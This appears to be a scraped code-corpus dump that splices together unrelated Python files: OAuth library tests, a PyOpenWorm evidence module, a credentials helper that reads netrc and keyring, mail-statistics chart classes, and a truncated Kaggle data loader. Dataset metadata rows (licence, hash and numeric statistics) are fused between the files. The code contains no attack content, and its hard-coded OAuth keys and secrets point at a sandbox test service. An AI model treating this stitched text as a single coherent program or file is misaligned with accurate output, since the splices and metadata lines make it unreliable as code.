def test_get_normalized_string_escapes_spaces_properly(self):
url = "http://sp.example.com/"
params = {
"some_random_data": random.randint(100, 1000),
"data": "This data with a random number (%d) has spaces!" % random.randint(1000, 2000),
}
req = oauth.Request("GET", url, params)
res = req.get_normalized_parameters()
expected = urllib.urlencode(sorted(params.items())).replace('+', '%20')
self.assertEqual(expected, res)
def test_sign_request(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200"
}
tok = oauth.Token(key="tok-test-key", secret="tok-test-secret")
con = oauth.Consumer(key="con-test-key", secret="con-test-secret")
params['oauth_token'] = tok.key
params['oauth_consumer_key'] = con.key
req = oauth.Request(method="GET", url=url, parameters=params)
methods = {
'TQ6vGQ5A6IZn8dmeGB4+/Jl3EMI=': oauth.SignatureMethod_HMAC_SHA1(),
'con-test-secret&tok-test-secret': oauth.SignatureMethod_PLAINTEXT()
}
for exp, method in methods.items():
req.sign_request(method, con, tok)
self.assertEquals(req['oauth_signature_method'], method.name)
self.assertEquals(req['oauth_signature'], exp)
def test_from_request(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
req = oauth.Request("GET", url, params)
headers = req.to_header()
# Test from the headers
req = oauth.Request.from_request("GET", url, headers)
self.assertEquals(req.method, "GET")
self.assertEquals(req.url, url)
self.assertEquals(params, req.copy())
# Test with bad OAuth headers
bad_headers = {
'Authorization' : 'OAuth this is a bad header'
}
self.assertRaises(oauth.Error, oauth.Request.from_request, "GET",
url, bad_headers)
# Test getting from query string
qs = urllib.urlencode(params)
req = oauth.Request.from_request("GET", url, query_string=qs)
exp = parse_qs(qs, keep_blank_values=False)
for k, v in exp.iteritems():
exp[k] = urllib.unquote(v[0])
self.assertEquals(exp, req.copy())
# Test that a boned from_request() call returns None
req = oauth.Request.from_request("GET", url)
self.assertEquals(None, req)
def test_from_token_and_callback(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
tok = oauth.Token(key="tok-test-key", secret="tok-test-secret")
req = oauth.Request.from_token_and_callback(tok)
self.assertFalse('oauth_callback' in req)
self.assertEquals(req['oauth_token'], tok.key)
req = oauth.Request.from_token_and_callback(tok, callback=url)
self.assertTrue('oauth_callback' in req)
self.assertEquals(req['oauth_callback'], url)
def test_from_consumer_and_token(self):
url = "http://sp.example.com/"
tok = oauth.Token(key="tok-test-key", secret="tok-test-secret")
con = oauth.Consumer(key="con-test-key", secret="con-test-secret")
req = oauth.Request.from_consumer_and_token(con, token=tok,
http_method="GET", http_url=url)
self.assertEquals(req['oauth_token'], tok.key)
self.assertEquals(req['oauth_consumer_key'], con.key)
class SignatureMethod_Bad(oauth.SignatureMethod):
name = "BAD"
def signing_base(self, request, consumer, token):
return ""
def sign(self, request, consumer, token):
return "invalid-signature"
class TestServer(unittest.TestCase):
def setUp(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['FOO','BAR'],
'foo': 59
}
self.consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
self.token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = self.token.key
params['oauth_consumer_key'] = self.consumer.key
self.request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
self.request.sign_request(signature_method, self.consumer, self.token)
def test_init(self):
server = oauth.Server(signature_methods={'HMAC-SHA1' : oauth.SignatureMethod_HMAC_SHA1()})
self.assertTrue('HMAC-SHA1' in server.signature_methods)
self.assertTrue(isinstance(server.signature_methods['HMAC-SHA1'],
oauth.SignatureMethod_HMAC_SHA1))
server = oauth.Server()
self.assertEquals(server.signature_methods, {})
def test_add_signature_method(self):
server = oauth.Server()
res = server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
self.assertTrue(len(res) == 1)
self.assertTrue('HMAC-SHA1' in res)
self.assertTrue(isinstance(res['HMAC-SHA1'],
oauth.SignatureMethod_HMAC_SHA1))
res = server.add_signature_method(oauth.SignatureMethod_PLAINTEXT())
self.assertTrue(len(res) == 2)
self.assertTrue('PLAINTEXT' in res)
self.assertTrue(isinstance(res['PLAINTEXT'],
oauth.SignatureMethod_PLAINTEXT))
def test_verify_request(self):
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
parameters = server.verify_request(self.request, self.consumer,
self.token)
self.assertTrue('bar' in parameters)
self.assertTrue('foo' in parameters)
self.assertTrue('multi' in parameters)
self.assertEquals(parameters['bar'], 'blerg')
self.assertEquals(parameters['foo'], 59)
self.assertEquals(parameters['multi'], ['FOO','BAR'])
def test_no_version(self):
url = "http://sp.example.com/"
params = {
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['FOO','BAR'],
'foo': 59
}
self.consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
self.token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = self.token.key
params['oauth_consumer_key'] = self.consumer.key
self.request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
self.request.sign_request(signature_method, self.consumer, self.token)
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
parameters = server.verify_request(self.request, self.consumer,
self.token)
def test_invalid_version(self):
url = "http://sp.example.com/"
params = {
'oauth_version': '222.9922',
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['foo','bar'],
'foo': 59
}
consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = token.key
params['oauth_consumer_key'] = consumer.key
request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
request.sign_request(signature_method, consumer, token)
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
self.assertRaises(oauth.Error, server.verify_request, request,
consumer, token)
def test_invalid_signature_method(self):
url = "http://sp.example.com/"
params = {
'oauth_version': '1.0',
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['FOO','BAR'],
'foo': 59
}
consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = token.key
params['oauth_consumer_key'] = consumer.key
request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = SignatureMethod_Bad()
request.sign_request(signature_method, consumer, token)
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
self.assertRaises(oauth.Error, server.verify_request, request,
consumer, token)
def test_missing_signature(self):
url = "http://sp.example.com/"
params = {
'oauth_version': '1.0',
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['FOO','BAR'],
'foo': 59
}
consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = token.key
params['oauth_consumer_key'] = consumer.key
request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
request.sign_request(signature_method, consumer, token)
del request['oauth_signature']
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
self.assertRaises(oauth.MissingSignature, server.verify_request,
request, consumer, token)
# Request Token: http://oauth-sandbox.sevengoslings.net/request_token
# Auth: http://oauth-sandbox.sevengoslings.net/authorize
# Access Token: http://oauth-sandbox.sevengoslings.net/access_token
# Two-legged: http://oauth-sandbox.sevengoslings.net/two_legged
# Three-legged: http://oauth-sandbox.sevengoslings.net/three_legged
# Key: bd37aed57e15df53
# Secret: 0e9e6413a9ef49510a4f68ed02cd
class TestClient(unittest.TestCase):
# oauth_uris = {
# 'request_token': '/request_token.php',
# 'access_token': '/access_token.php'
# }
oauth_uris = {
'request_token': '/request_token',
'authorize': '/authorize',
'access_token': '/access_token',
'two_legged': '/two_legged',
'three_legged': '/three_legged'
}
consumer_key = 'bd37aed57e15df53'
consumer_secret = '0e9e6413a9ef49510a4f68ed02cd'
host = 'http://oauth-sandbox.sevengoslings.net'
def setUp(self):
self.mox = mox.Mox()
self.consumer = oauth.Consumer(key=self.consumer_key,
secret=self.consumer_secret)
self.body = {
'foo': 'bar',
'bar': 'foo',
'multi': ['FOO','BAR'],
'blah': 599999
}
def tearDown(self):
self.mox.UnsetStubs()
def _uri(self, type):
uri = self.oauth_uris.get(type)
if uri is None:
raise KeyError("%s is not a valid OAuth URI type." % type)
return "%s%s" % (self.host, uri)
def create_simple_multipart_data(self, data):
boundary = '---Boundary-%d' % random.randint(1,1000)
crlf = '\r\n'
items = []
for key, value in data.iteritems():
items += [
'--'+boundary,
'Content-Disposition: form-data; name="%s"'%str(key),
'',
str(value),
]
items += ['', '--'+boundary+'--', '']
content_type = 'multipart/form-data; boundary=%s' % boundary
return content_type, crlf.join(items)
def test_access_token_get(self):
"""Test getting an access token via GET."""
client = oauth.Client(self.consumer, None)
resp, content = client.request(self._uri('request_token'), "GET")
self.assertEquals(int(resp['status']), 200)
def test_access_token_post(self):
"""Test getting an access token via POST."""
client = oauth.Client(self.consumer, None)
resp, content = client.request(self._uri('request_token'), "POST")
self.assertEquals(int(resp['status']), 200)
res = dict(parse_qsl(content))
self.assertTrue('oauth_token' in res)
self.assertTrue('oauth_token_secret' in res)
def _two_legged(self, method):
client = oauth.Client(self.consumer, None)
return client.request(self._uri('two_legged'), method,
body=urllib.urlencode(self.body))
def test_two_legged_post(self):
"""A test of a two-legged OAuth POST request."""
resp, content = self._two_legged("POST")
self.assertEquals(int(resp['status']), 200)
def test_two_legged_get(self):
"""A test of a two-legged OAuth GET request."""
resp, content = self._two_legged("GET")
self.assertEquals(int(resp['status']), 200)
def test_multipart_post_does_not_alter_body(self):
self.mox.StubOutWithMock(httplib2.Http, 'request')
random_result = random.randint(1,100)
data = {
'rand-%d'%random.randint(1,100):random.randint(1,100),
}
content_type, body = self.create_simple_multipart_data(data)
client = oauth.Client(self.consumer, None)
uri = self._uri('two_legged')
expected_kwargs = {
'method':'POST',
'body':body,
'redirections':httplib2.DEFAULT_MAX_REDIRECTS,
'connection_type':None,
'headers':mox.IsA(dict),
}
httplib2.Http.request(client, uri, **expected_kwargs).AndReturn(random_result)
self.mox.ReplayAll()
result = client.request(uri, 'POST', headers={'Content-Type':content_type}, body=body)
self.assertEqual(result, random_result)
self.mox.VerifyAll()
if __name__ == "__main__":
unittest.main()
| mit | -2,785,435,832,432,267,000 | 35.196429 | 121 | 0.606117 | false | 3.691271 | true | false | false |
kaustubhcs/PyOpenWorm | PyOpenWorm/evidence.py | 2 | 12890 | from PyOpenWorm import *
class EvidenceError(Exception):
pass
def _pubmed_uri_to_pmid(uri):
from urlparse import urlparse
parsed = urlparse(uri)
pmid = int(parsed.path.split("/")[2])
return pmid
def _doi_uri_to_doi(uri):
from urlparse import urlparse
from urllib2 import unquote
parsed = urlparse(uri)
doi = parsed.path.split("/")[1]
# the doi from a url needs to be decoded
doi = unquote(doi)
return doi
def _url_request(url,headers={}):
import urllib2 as U
try:
r = U.Request(url, headers=headers)
s = U.urlopen(r, timeout=1)
return s
except U.HTTPError:
return ""
except U.URLError:
return ""
def _json_request(url):
import json
headers = {'Content-Type': 'application/json'}
try:
return json.load(_url_request(url,headers))
except BaseException:
return {}
class AssertsAllAbout(Property):
# TODO: Needs tests!
multiple=True
def __init__(self, **kwargs):
Property.__init__(self, 'asserts_all_about', **kwargs)
def set(self, o, **kwargs):
"""Establish the "asserts" relationship for all of the properties of the given object"""
self.owner.asserts(o)
for p in o.properties:
self.owner.asserts(p)
def get(self, **kwargs):
# traverse the hierarchy of ObjectProperties and return all of the asserts relationships...
ns = { "ow": self.base_namespace,
"ns1" : self.rdf_namespace,
"ev": self.base_namespace["Evidence"] + "/",
"ns2" : self.base_namespace["SimpleProperty"] + "/"
}
q = """
SELECT ?DataObject ?x ?prop WHERE
{
?DataObject rdf:type ow:DataObject .
?DataObject ?x ?DataObject_prop .
?DataObject_prop sp:value ?prop .
?Evidence ev:asserts ?Evidence_asserts .
filter (EXISTS { ?DataObject_prop rdf:type ow:Property . })
# object
# asserts property pattern
# general property pattern
}
"""
def triples(self, **kwargs):
#XXX: All triples here are from ``asserts``
return []
class Evidence(DataObject):
"""
A representation of some document which provides evidence like scholarly
references, for other objects.
Possible keys include::
pmid,pubmed: a pubmed id or url (e.g., 24098140)
wbid,wormbase: a wormbase id or url (e.g., WBPaper00044287)
doi: a Digitial Object id or url (e.g., s00454-010-9273-0)
Attaching evidence
-------------------
Attaching evidence to an object is as easy as::
e = Evidence(author='White et al.', date='1986')
e.asserts(Connection(pre_cell="VA11", post_cell="VD12"))
e.save()
But what does this series of statements mean? For us it means that White et al.
assert that "the cells VA11 and VD12 have a connection".
In particular, it says nothing about the neurons themselves.
Another example::
e = Evidence(author='Sulston et al.', date='1983')
e.asserts(Neuron(name="AVDL").lineageName("AB alaaapalr"))
e.save()
This would say that Sulston et al. claimed that neuron AVDL has lineage AB alaaapalr.
Now a more ambiguous example::
e = Evidence(author='Sulston et al.', date='1983')
e.asserts(Neuron(name="AVDL"))
e.save()
What might this mean? There's no clear relationship being discussed as in the
previous examples. There are two reasonable semantics for
these statements. They could indicate that Sulston et al. assert everything
about the AVDL (in this case, only its name). Or they could
indicate that Sulston et al. state the existence of AVDL. We will assume the
semantics of the latter for *most* objects. The second
intention can be expressed as::
e = Evidence(author='Sulston et al.', date='1983')
e.asserts_all_about(Neuron(name="AVDL"))
e.save()
`asserts_all_about` individually asserts each of the properties of the Neuron
including its existence. It does not recursively assert
properties of values set on the AVDL Neuron. If, for instance, the Neuron had a
*complex object* as the value for its receptor types with
information about the receptor's name primary agonist, etc., `asserts_all_about`
would say nothing about these. However, `asserts_all` (TODO)::
e.asserts_all(Neuron(name="AVDL",receptor=complex_receptor_object))
would make the aforementioned recursive statement.
Retrieving evidence
-------------------
.. Not tested with the latest
Retrieving evidence for an object is trivial as well ::
e = Evidence()
e.asserts(Connection(pre_cell="VA11", post_cell="VD12"))
for x in e.load():
print x
This would print all of the evidence for the connection between VA11 and VD12
It's important to note that the considerations of recursive evidence assertions
above do not operate for retrieval. Only evidence for the
particular object queried (the Connection in the example above), would be
returned and not any evidence for anything otherwise about VA11
or VD12.
Attributes
----------
asserts : ObjectProperty (value_type=DataObject)
When used with an argument, state that this Evidence asserts that the
relationship is true.
Example::
import bibtex
bt = bibtex.parse("my.bib")
n1 = Neuron("AVAL")
n2 = Neuron("DA3")
c = Connection(pre=n1,post=n2,class="synapse")
e = Evidence(bibtex=bt['white86'])
e.asserts(c)
Other methods return objects which asserts accepts.
Example::
n1 = Neuron("AVAL")
r = n1.neighbor("DA3")
e = Evidence(bibtex=bt['white86'])
e.asserts(r)
When used without arguments, returns a sequence of statements asserted by
this evidence
Example::
import bibtex
bt = bibtex.parse("my.bib")
n1 = Neuron("AVAL")
n2 = Neuron("DA3")
c = Connection(pre=n1,post=n2,class="synapse")
e = Evidence(bibtex=bt['white86'])
e.asserts(c)
list(e.asserts()) # Returns a list [..., d, ...] such that d==c
doi : DatatypeProperty
A Digital Object Identifier (DOI) that provides evidence, optional
pmid : DatatypeProperty
A PubMed ID (PMID) that point to a paper that provides evidence, optional
wormbaseid : DatatypeProperty
An ID from WormBase that points to a record that provides evidence, optional
author : DatatypeProperty
The author of the evidence
title : DatatypeProperty
The title of the evidence
year : DatatypeProperty
The date (e.g., publication date) of the evidence
uri : DatatypeProperty
A URL that points to evidence
Parameters
----------
doi : string
A Digital Object Identifier (DOI) that provides evidence, optional
pmid : string
A PubMed ID (PMID) that point to a paper that provides evidence, optional
wormbaseid : string
An ID from WormBase that points to a record that provides evidence, optional
author : string
The author of the evidence
title : string
The title of the evidence
year : string or int
The date (e.g., publication date) of the evidence
uri : string
A URL that points to evidence
"""
def __init__(self, conf=False, **source):
# The type of the evidence (a paper, a lab, a uri) is
# determined by the `source` key
# We keep track of a set of fields for the evidence.
# Some of the fields are pulled from provided URIs and
# some is provided by the user.
#
# Turns into a star graph
#
# Evidence field1 value1
# ; field2 value2
# ; field3 value3 .
DataObject.__init__(self, conf=conf)
self._fields = dict()
Evidence.ObjectProperty('asserts', multiple=True, owner=self)
AssertsAllAbout(owner=self)
multivalued_fields = ('author', 'uri')
for x in multivalued_fields:
Evidence.DatatypeProperty(x, multiple=True, owner=self)
other_fields = ('year',
'title',
'doi',
'wbid',
'pmid')
fields = multivalued_fields + other_fields
for x in other_fields:
Evidence.DatatypeProperty(x, owner=self)
#XXX: I really don't like putting these in two places
for k in source:
if k in ('pubmed', 'pmid'):
self._fields['pmid'] = source[k]
self._pubmed_extract()
self.pmid(source[k])
if k in ('wormbaseid','wormbase', 'wbid'):
self._fields['wormbase'] = source[k]
self._wormbase_extract()
self.wbid(source[k])
if k in ('doi',):
self._fields['doi'] = source[k]
self._crossref_doi_extract()
self.doi(source[k])
if k in ('bibtex',):
self._fields['bibtex'] = source[k]
if k in fields:
getattr(self,k)(source[k])
def add_data(self, k, v):
""" Add a field
Parameters
----------
k : string
Field name
v : string
Field value
"""
self._fields[k] = v
dp = Evidence.DatatypeProperty(k,owner=self)
dp(v)
# Each 'extract' method should attempt to fill in additional fields given which ones
# are already set as well as correct fields that are wrong
# TODO: Provide a way to override modification of already set values.
def _wormbase_extract(self):
#XXX: wormbase's REST API is pretty sparse in terms of data provided.
# Would be better off using AQL or the perl interface
# _Very_ few of these have these fields filled in
wbid = self._fields['wormbase']
def wbRequest(ident,field):
return _json_request("http://api.wormbase.org/rest/widget/paper/"+wbid+"/"+field)
# get the author
j = wbRequest(wbid, 'authors')
if 'fields' in j:
f = j['fields']
if 'data' in f:
self.author([x['label'] for x in f['data']])
elif 'name' in f:
self.author(f['name']['data']['label'])
# get the publication date
j = wbRequest(wbid, 'publication_date')
if 'fields' in j:
f = j['fields']
if 'data' in f:
self.year(f['data']['label'])
elif 'name' in f:
self.year(f['name']['data']['label'])
def _crossref_doi_extract(self):
# Extract data from crossref
def crRequest(doi):
import urllib as U
data = {'q': doi}
data_encoded = U.urlencode(data)
return _json_request('http://search.labs.crossref.org/dois?%s' % data_encoded)
doi = self._fields['doi']
if doi[:4] == 'http':
doi = _doi_uri_to_doi(doi)
r = crRequest(doi)
#XXX: I don't think coins is meant to be used, but it has structured data...
if len(r)>0:
extra_data = r[0]['coins'].split('&')
fields = (x.split("=") for x in extra_data)
fields = [[y.replace('+', ' ').strip() for y in x] for x in fields]
authors = [x[1] for x in fields if x[0] == 'rft.au']
for a in authors:
self.author(a)
# no error for bad ids, just an empty list
if len(r) > 0:
# Crossref can process multiple doi's at one go and return the metadata. we just need the first one
r = r[0]
if 'title' in r:
self.title(r['title'])
if 'year' in r:
self.year(r['year'])
def _pubmed_extract(self):
def pmRequest(pmid):
import xml.etree.ElementTree as ET # Python 2.5 and up
base = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/'
# XXX: There's more data in esummary.fcgi?, but I don't know how to parse it
url = base + "esummary.fcgi?db=pubmed&id=%d" % pmid
return ET.parse(_url_request(url))
pmid = self._fields['pmid']
if pmid[:4] == 'http':
# Probably a uri, right?
pmid = _pubmed_uri_to_pmid(pmid)
pmid = int(pmid)
tree = pmRequest(pmid)
for x in tree.findall('./DocSum/Item[@Name="AuthorList"]/Item'):
self.author(x.text)
| mit | 8,356,134,866,388,307,000 | 34.122616 | 115 | 0.578898 | false | 3.84891 | false | false | false |
jhermann/rudiments | src/rudiments/security.py | 1 | 5487 | # -*- coding: utf-8 -*-
# pylint: disable=bad-continuation
""" Security / AuthN / AuthZ helpers.
"""
# Copyright © 2015 - 2019 Jürgen Hermann <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, unicode_literals, print_function
import re
import errno
import base64
import getpass
from netrc import netrc, NetrcParseError
try:
import keyring_DISABLED_FOR_NOW # TODO
except ImportError:
keyring = None
from ._compat import urlparse
__all__ = ['Credentials']
class Credentials():
"""Look up and provide authN credentials (username / password) from common sources."""
URL_RE = re.compile(r'^(http|https|ftp|ftps)://') # covers the common use cases
NETRC_FILE = None # use the default, unless changed for test purposes
AUTH_MEMOIZE_INPUT = {} # remember manual auth input across several queries in one run
def __init__(self, target):
"""``target`` is a representation of the secured object, typically an URL."""
self.target = target
self.user = None
self.password = None
self.keyring_service = target
self.source = None
def auth_valid(self):
"""Return bool indicating whether full credentials were provided."""
return bool(self.user and self.password)
def auth_pair(self, force_console=False):
"""Return username/password tuple, possibly prompting the user for them."""
if not self.auth_valid():
self._get_auth(force_console)
return (self.user, self.password)
def _raw_input(self, prompt=None):
"""Mockable wrapper for raw_input."""
return input(prompt)
def _get_auth(self, force_console=False):
"""Try to get login auth from known sources."""
if not self.target:
raise ValueError("Unspecified target ({!r})".format(self.target))
elif not force_console and self.URL_RE.match(self.target):
auth_url = urlparse(self.target)
source = 'url'
if auth_url.username:
self.user = auth_url.username
if auth_url.password:
self.password = auth_url.password
if not self.auth_valid():
source = self._get_auth_from_keyring()
if not self.auth_valid():
source = self._get_auth_from_netrc(auth_url.hostname)
if not self.auth_valid():
source = self._get_auth_from_console(self.target)
else:
source = self._get_auth_from_console(self.target)
if self.auth_valid():
self.source = source
def _get_auth_from_console(self, realm):
"""Prompt for the user and password."""
self.user, self.password = self.AUTH_MEMOIZE_INPUT.get(realm, (self.user, None))
if not self.auth_valid():
if not self.user:
login = getpass.getuser()
self.user = self._raw_input('Username for "{}" [{}]: '.format(realm, login)) or login
self.password = getpass.getpass('Password for "{}": '.format(realm))
Credentials.AUTH_MEMOIZE_INPUT[realm] = self.user, self.password
return 'console'
def _get_auth_from_netrc(self, hostname):
"""Try to find login auth in ``~/.netrc``."""
try:
hostauth = netrc(self.NETRC_FILE)
except IOError as cause:
if cause.errno != errno.ENOENT:
raise
return None
except NetrcParseError as cause:
raise # TODO: Map to common base class, so caller has to handle less error types?
# Try to find specific `user@host` credentials first, then just `host`
auth = hostauth.hosts.get('{}@{}'.format(self.user or getpass.getuser(), hostname), None)
if not auth:
auth = hostauth.hosts.get(hostname, None)
if auth:
username, account, password = auth # pylint: disable=unpacking-non-sequence
if username:
self.user = username
if password == 'base64':
# support for password obfuscation, prevent "over the shoulder lookup"
self.password = base64.b64decode(account).decode('ascii')
elif password:
self.password = password
return 'netrc'
def _get_password_from_keyring(self, accountname):
"""Query keyring for a password entry."""
return keyring.get_password(self.keyring_service, accountname)
def _get_auth_from_keyring(self):
"""Try to get credentials using `keyring <https://github.com/jaraco/keyring>`_."""
if not keyring:
return None
# Take user from URL if available, else the OS login name
password = self._get_password_from_keyring(self.user or getpass.getuser())
if password is not None:
self.user = self.user or getpass.getuser()
self.password = password
return 'keyring'
| apache-2.0 | -7,458,670,958,381,981,000 | 37.356643 | 101 | 0.620966 | false | 4.139623 | false | false | false |
txsl/mail-trends | stats/bucket.py | 3 | 5756 | from pygooglechart import StackedVerticalBarChart, Axis
from base import *
_Y_AXIS_SPACE = 36
class BucketStat(ChartStat):
def __init__(self, bucket_count, title, width, height):
ChartStat.__init__(self)
self.__buckets = [0] * bucket_count
self.__max = 0
self.__title = title
self.__width = width
self.__height = height
def _GetBucketCollection(self, message_infos, threads):
return message_infos
def ProcessMessageInfos(self, message_infos, threads):
for bucket_obj in self._GetBucketCollection(message_infos, threads):
bucket = self._GetBucket(bucket_obj)
if bucket is None: continue
self.__buckets[bucket] += 1
v = self.__buckets[bucket]
if v > self.__max:
self.__max = v
def GetHtml(self):
max = self._GetRescaledMax(self.__max)
w = self.__width
h = self.__height
# We don't really care about StackedVerticalBarChart vs.
# GroupedVerticalBarChart since we just have one data-set, but only the
# stacked graph seems to respect the bar spacing option
chart = StackedVerticalBarChart(w, h)
# Compute bar width so that it fits in the overall graph width.
bucket_width = (w - _Y_AXIS_SPACE)/len(self.__buckets)
bar_width = bucket_width * 4/5
space_width = bucket_width - bar_width
chart.set_bar_width(bar_width)
chart.set_bar_spacing(space_width)
chart.add_data(self._GetRescaledData(self.__buckets, max))
chart.set_axis_range(Axis.LEFT, 0, max)
chart.set_axis_labels(Axis.BOTTOM, self._GetBucketLabels())
# We render the title in the template instead of in the chart, to give
# stat collections and individual stats similar appearance
t = Template(
file="templates/bucket-stat.tmpl",
searchList = {
"id": self.id,
"title": self.__title,
"width": w,
"height": h,
"chart_url": chart.get_url()
})
return unicode(t)
class TimeOfDayStat(BucketStat):
def __init__(self):
BucketStat.__init__(self, 24, 'Time of day', 400, 200)
def _GetBucket(self, message_info):
return message_info.GetDate().tm_hour
def _GetBucketLabels(self):
return ['Midnight', '', '', '', '', '',
'6 AM', '', '', '', '', '',
'Noon', '', '', '', '', '',
' 6 PM', '', '', '', '', '']
class DayOfWeekStat(BucketStat):
def __init__(self):
BucketStat.__init__(self, 7, 'Day of week', 300, 200)
def _GetBucket(self, message_info):
# In the time tuple Monday is 0, but we want Sunday to be 0
return (message_info.GetDate().tm_wday + 1) % 7
def _GetBucketLabels(self):
return ['S', 'M', 'T', 'W', 'T', 'F', 'S']
class YearStat(BucketStat):
def __init__(self, date_range):
self.__years = GetYearRange(date_range)
width = _Y_AXIS_SPACE + 30 * len(self.__years)
BucketStat.__init__(
self, len(self.__years), "Year", width, 200)
def _GetBucket(self, message_info):
return message_info.GetDate().tm_year - self.__years[0]
def _GetBucketLabels(self):
return [str(x) for x in self.__years]
class MonthStat(BucketStat):
def __init__(self, year):
self.__year = year
# No title is necessary, since the stat collection provides one
BucketStat.__init__(self, 12, None, 300, 200)
def _GetBucket(self, message_info):
date = message_info.GetDate()
if date.tm_year == self.__year:
return date.tm_mon - 1
else:
return None
def _GetBucketLabels(self):
return MONTH_NAMES
class DayStat(BucketStat):
def __init__(self, year, month):
self.__year = year
self.__month = month
self.__days_in_month = calendar.monthrange(year, month)[1]
# No title is necessary, since the stat collection provides one
BucketStat.__init__(
self,
self.__days_in_month,
None,
500,
200)
def _GetBucket(self, message_info):
date = message_info.GetDate()
if date.tm_year == self.__year and date.tm_mon == self.__month:
return date.tm_mday - 1
else:
return None
def _GetBucketLabels(self):
return [str(d) for d in range(1, self.__days_in_month + 1)]
class SizeBucketStat(BucketStat):
_SIZE_BUCKETS = [
0,
1 << 9,
1 << 10,
1 << 11,
1 << 12,
1 << 13,
1 << 14,
1 << 15,
1 << 16,
1 << 17,
1 << 18,
1 << 19,
1 << 20,
1 << 21,
1 << 22,
1 << 23,
]
def __init__(self):
BucketStat.__init__(
self,
len(SizeBucketStat._SIZE_BUCKETS),
"Message sizes",
500,
200)
def _GetBucket(self, message_info):
size = message_info.size
for i in reversed(xrange(0, len(SizeBucketStat._SIZE_BUCKETS))):
if size >= SizeBucketStat._SIZE_BUCKETS[i]:
return i
def _GetBucketLabels(self):
return [GetDisplaySize(s) for s in SizeBucketStat._SIZE_BUCKETS]
class ThreadSizeBucketStat(BucketStat):
_SIZE_BUCKETS = [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
20,
30,
40,
50,
100,
150,
200,
]
def __init__(self):
BucketStat.__init__(
self,
len(ThreadSizeBucketStat._SIZE_BUCKETS),
"Thread lengths",
500,
200)
def _GetBucketCollection(self, message_infos, threads):
return threads
def _GetBucket(self, thread):
size = len(thread)
for i in reversed(xrange(0, len(ThreadSizeBucketStat._SIZE_BUCKETS))):
if size >= ThreadSizeBucketStat._SIZE_BUCKETS[i]:
return i
def _GetBucketLabels(self):
return [str(s) for s in ThreadSizeBucketStat._SIZE_BUCKETS] | apache-2.0 | -1,530,671,495,127,133,400 | 24.25 | 75 | 0.582349 | false | 3.488485 | false | false | false |
zhmz90/first_step_with_julia_kaggle.jl | King/sklearn.py | 1 | 1747 | # Loading Data
import pandas as pd
from skimage.io import imread
import numpy as np
def read_data(typeData, labelsInfo, imageSize, path):
#Intialize x matrix
x = np.zeros((labelsInfo.shape[0], imageSize))
for (index, idImage) in enumerate(labelsInfo["ID"]):
#Read image file
nameFile = "{0}/{1}Resized/{2}.Bmp".format(path, typeData, idImage)
img = imread(nameFile, as_grey=True)
x[index, :] = np.reshape(img, (1, imageSize))
return x
imageSize = 400 # 20 x 20 pixels
#Set location of data files , folders
path = "/home/guo/haplox/Github/first_step_with_julia_kaggle/data/data"
labelsInfoTrain = pd.read_csv("{0}/trainLabels.csv".format(path))
#Read training matrix
xTrain = read_data("train", labelsInfoTrain, imageSize, path)
#Read information about test data ( IDs ).
labelsInfoTest = pd.read_csv("{0}/sampleSubmission.csv".format(path))
#Read test matrix
